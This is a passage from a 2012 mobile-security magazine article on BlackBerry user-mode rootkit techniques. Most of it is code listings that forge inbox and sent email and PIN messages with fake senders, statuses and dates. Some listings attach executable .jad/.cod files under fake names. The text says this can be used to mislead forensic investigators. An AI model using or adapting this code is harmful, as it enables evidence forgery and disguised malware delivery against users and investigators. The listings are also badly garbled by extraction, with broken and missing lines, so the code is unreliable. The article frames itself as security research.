MESSAGE BUIDLER
}
}
else if (field == checkiaButton)
{
String imessage =
“^_^”;
//MESSAGE BODY
Address iaddress
= null;
try
{
iaddress
//
MESSAGE SENDER
}
catch
e.getMessage(); }
res += MisLeadInbo
xMessageAttach(iaddress, imessage);
//EMAIL MESSAGE
BUIDLER
Dialog.alert(“Result for you :: “ + res);
}
}

Listing 8c. MESSAGE MISLEADING
static String MisLeadSentMessage(Address oaddress,
String message, boolean delivered)
//BUILDER OF SENT EMAIL MESSAGE
{
String error_message = “”;
Store store = Session.
getDefaultInstance().getStore();
Folder[] folders = store.list(Folder.
SENT);
// RETRIVE A SENT FOLDER
Folder sentfolder = folders[0];
Message msg = new Message(sentfolder);
//CREATE a NEW MESSAGE IN SENT FOLDER
if (delivered) // CHECK DELIVERY STATUS
{
msg.setStatus(Message.Status.
TX_SENT, Message.Status.TX_SENT);
}
else
{
TX_ERROR, Message.Status.TX_ERROR);
msg.setFlag(Message.Flag.
OPENED, true);
// SET READ STATUS
}
try
{
msg.addRecipient(Message.
RecipientType.TO, oaddress);
// ADD RECIPIENT
}
catch (MessagingException e) { error_
message += e.getMessage(); }
msg.setSubject(“subject”);
// ADD SUBJECT TO EMAIL MESSAGES
try
{
msg.setSentDate(new Date());
// ADD NEW DATE
}
try
{
msg.setContent(message);
// ADD BODY
}
msg.setSentDate(new Date(System.
currentTimeMillis()));
// ADD NEW TIME
sentfolder.appendMessage(msg);
// ADD NEW EMAIL MESSAGE TO SENT FOLDER
if (error_message.length() < 1) { error_
message = “no_error”; }
return error_message;
}
static String MisLeadInboxMessage(Address
fromAddress, String message)
//BUILDER OF RECEIVED EMAIL MESSAGE WITHOUT
ATTACHMENT
{
Session session = null;
try
{
session = Session.
waitForDefaultSession();
}
catch (NoSuchServiceException e) { error_
Store store = session.getStore();
INBOX);
// RETRIVE AN INBOX FOLDER
Folder inbox = folders[0];
final Message msg = new Message(inbox);
//CREATE A NEW MESSAGE IN INBOX FOLDER
try
{
}
msg.setFrom(fromAddress);
//ADD A SENDER
msg.setStatus(Message.Status.RX_RECEIVED,
Message.Status.RX_RECEIVED);
//ADD A RECEIVED STATUS
//ADD DATE’n’TIME
msg.setFlag(Message.Flag.REPLY_ALLOWED,
true);
msg.setInbound(true);

78 04/2012
Mobile
Security
Listing 8d. MESSAGE MISLEADING
//ADD A SUBJECT TO EMAIL MESSAGE
inbox.appendMessage(msg);
//ADD EMAIL MESSAGE TO THE INBOX FOLDER
if (error_message.length() < 1)
{
error_message = “no_error”;
}
}
static String MisLeadSentPIN(String FakePIN)
//BUILDER OF SENT PIN MESSAGE
{
String err = “”;
SENT);
//RETRIEVE a PIN SENT FOLDER
Folder sentfolder = folders[0];
Message msg = new Message(sentfolder);
//CREATE A PIN MESSAGE IN THE SENT FOLDER
PINAddress recipients[] = new
PINAddress[1];
try
{
recipients[0]= new
PINAddress(FakePIN, “Robert”);
//ADD RECIPIENT BY PIN and
NAME
}
catch (Exception e) { err +=
e.getMessage(); }
try
{
msg.addRecipients(Message.
RecipientType.TO, recipients);
//ADD RECIPIENTS TO PIN
STRUCTURE
msg.setSubject(“SUBJ”);
//ADD A SUBJECT
msg.setContent(“BODY”);
//ADD A BODY
TX_SENT, Message.Status.TX_SENT);
//ADD A SENT STATUS
sentfolder.appendMessage(msg);
//PUT MESSAGE INTO SENT FOLDER
}
e.getMessage(); }
return err;
}
static String MisLeadInboxPIN(String FakePIN)
//BUILDER OF RECEIVED PIN MESSAGE
{
String err = ““;
INBOX);
//RETRIEVE a PIN INBOX FOLDER
Folder inboxfolder = folders[0];
Message msg = new Message(inboxfolder);
//CREATE A PIN MESSAGE IN THE INBOX
FOLDER
PINAddress recipients[] = new
PINAddress[1];
try
{
recipients[0]= new
PINAddress(FakePIN, “Robert”);
//ADD RECIPIENT BY PIN and NAME
}
e.getMessage(); }
try
{
msg.addRecipients(Message.
RecipientType.TO, recipients);
//ADD RECIPIENTS TO PIN STRUCTURE
msg.setSubject(“SUBJ”);
//ADD A SUBJECT
msg.setContent(“BODY”);
//ADD A BODY
RX_RECEIVED, Message.Status.RX_
RECEIVED);
inboxfolder.appendMessage(msg);
//PUT MESSAGE INTO INBOX FOLDER
}
e.getMessage(); }
return err;
}
static String MisLeadInboxMessageAttach(Address
fromAddress, String message)
//BUILDER OF RECEIVED EMAIL MESSAGE WITH ATTACHMENT
{

Listing 8e. MESSAGE MISLEADING
Session session = null;
try
{
session = Session.
waitForDefaultSession();
}
Store store = session.getStore();
INBOX);
// RETRIVE AN INBOX FOLDER
Folder inbox = folders[0];
final Message msg = new Message(inbox);
//CREATE A NEW MESSAGE IN INBOX FOLDER
try
{
}
msg.setFrom(fromAddress);
//ADD A SENDER
msg.setStatus(Message.Status.RX_RECEIVED,
Message.Status.RX_RECEIVED);
//ADD DATE’n’TIME
msg.setFlag(Message.Flag.REPLY_ALLOWED,
true);
msg.setInbound(true);
//ADD A SUBJECT TO EMAIL MESSAGE
String fullname1 = “file:///SDCard/bin/
BlackBerryKit_1.jad”;
String fullname2 = “file:///SDCard/bin/
BlackBerryKit_1.cod”;
//SET PATH OF EXECUTION FILE
byte[] data = new byte[256];
data = readFile(fullname1);
//CALL YOUR OWN READ METHOD TO GET
ATTACHMENT DATA
Multipart multipart = new Multipart();
SupportedAttachmentPart attach = null;
String mtype = “”;
try
{
try
{
mtype
= MIMETypeAssociations.
getMIMEType(fullname1);
//ADD ATTACHMENT
WITH CORRECT FILE TYPE
}
catch (Exception e) { error_
}
finally
{
attach = new SupportedAttach
mentPart(multipart, mtype, “file-
name-$$”, data);
//ADD A FAKE ATTACHMENT NAME
}
multipart.addBodyPart(attach);
data = readFile(fullname2);
mtype = “”;
try
{
try
{
mtype
= MIMETypeAssociations.
getMIMEType(fullname2);
//ADD ATTACHMENT
WITH CORRECT FILE TYPE
}
catch (Exception e)
{
error_message +=
e.getMessage();
}
}
finally
{
attach = new SupportedAttach
mentPart(multipart, mtype, “file-
name-$$$”, data);
//ADD A FAKE ATTACHMENT NAME
}
multipart.addBodyPart(attach);
try
{
msg.setContent(multipart);
}
catch (MessagingException e)

80 04/2012
Mobile
Security
the previous location, so it is a kind of timeline (Figure
21 and Listing 8).
Conclusion
These two articles describe how anyone could easily
develop malware or a security application to manage
with other vulnerabilities. These highlighted points are
very actual because some of them take advantage of
old security issues and concepts from DOS, UNIX and
other OSs.
Yury Chemerkin
Graduated at Russian State University for the Humanities
(http://rggu.com/) in 2010. At present, postgraduate at RSUH.
Information Security Researcher since 2009 and currently
works as mobile and social information security researcher in
Moscow. Experienced in Reverse Engineering, Software Pro-
gramming, Cyber & Mobile Security Researching, Documen-
tation, and Security Writing as regular contributor. Now re-
searching Cloud Security and Social Privacy.
Contacts: I have a lot of social contacts, that’s way you’re able
to choose the most suitable way for you.
Regular blog: http://security-through-obscurity.blogspot.com
Regular Email: yury.chemerkin@gmail.com
Skype: yury.chemerkin
Other my contacts (blogs, IM, social networks) you’ll find
among http links and social icons before TimeLine section on
Re.Vu: http://re.vu/yury.chemerkin
Listing 8f. MESSAGE MISLEADING
{
error_message +=
e.getMessage();
}
//ADD A FAKE ATTACHMENT
inbox.appendMessage(msg);
//PUT AN EMAIL MESSAGE WITH ATTACHMENT TO INBOX FOLDER
if (error_message.length() < 1)
{
error_message = “no_error”;
}
}
public static byte[] readFile(String FullName)
{
byte[] data = null;
DataInputStream is = null;
try
{
fconn = (FileConnection) Connector.
open(FullName, Connector.READ);
is = fconn.
openDataInputStream();
data = IOUtilities.
streamToBytes(is);
}
catch (IOException e) { Dialog.alert(e.
getMessage()); }
finally
{
try
{
if (null != is)
{
is.close();
}
if (null != fconn)
{
fconn.
close();
}
}
catch (IOException e) {
Dialog.alert(e.getMessage()); }
}
return data;
}
}
Figure 21. ScreenShot of BlackBerry Map

The last exploitation
The last exploitation covers so-called message misleading dis-
cussed in one of my previous articles. I recall some ideas and
present code that attempts to cover all entry points and can
be easily adapted for testing. RIM API has ability to create PIN
and e-mail with any possible parameters like their type as in-
coming, outgoing, received, sent, draft, etc. and their status
(read, unread, error while sent, etc.). You may set your own
date, list of recipients, subjects, body, attachments. Note that
not one of these messages will synchronize with your real e-
mail service. What are the goals you gain by implementing
these ideas? Maybe you would like to build steganography,
maybe you have to make a lot of fake message with fake in-
teraction graphs to perplex forensic investigating or maybe
something else – it is all up to you (Figure 22-Figure 25).
On the Net
• http://forum.drweb.com/index.php?showtopic=302926 – New Trojan horse for Android spreads with Angry Birds Rio Unlock,
Dr.Web
• http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu.html, http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu2/ – Researching
for DroidKungFu variants, Xuxian Jiang, Assistant Professor, Department of Computer Science, NC State University
• http://blog.mylookout.com/blog/2011/01/07/geinimi-trojan-technical-analysis/ – Geinimi Trojan Technical Analysis,
• http://www.informationweek.com/news/security/mobile/231001685 – Zitmo Banking Trojan
• http://www.computerworld.com/s/article/9210764/New_bank_Trojan_employs_fresh_tricks_to_steal_account_data – OddJob
bank trojan
• http://www.elcomsoft.com/ebbe.html – Elcomsoft Blackberry Backup Explorer
Figure 22. Sent Email Message
Figure 23. Received Email Message with attach Figure 25. Pin-to-PIN Message with Sent Status
Figure 24. Pin-to-PIN Message with Error Status

When developers api simplify user mode rootkits development – part ii

Recommended

Recommended

More Related Content

What's hot

What's hot (19)

Viewers also liked

Viewers also liked (8)

Similar to When developers api simplify user mode rootkits development – part ii

Similar to When developers api simplify user mode rootkits development – part ii (20)

More from Yury Chemerkin

More from Yury Chemerkin (20)

Recently uploaded

Recently uploaded (20)

When developers api simplify user mode rootkits development – part ii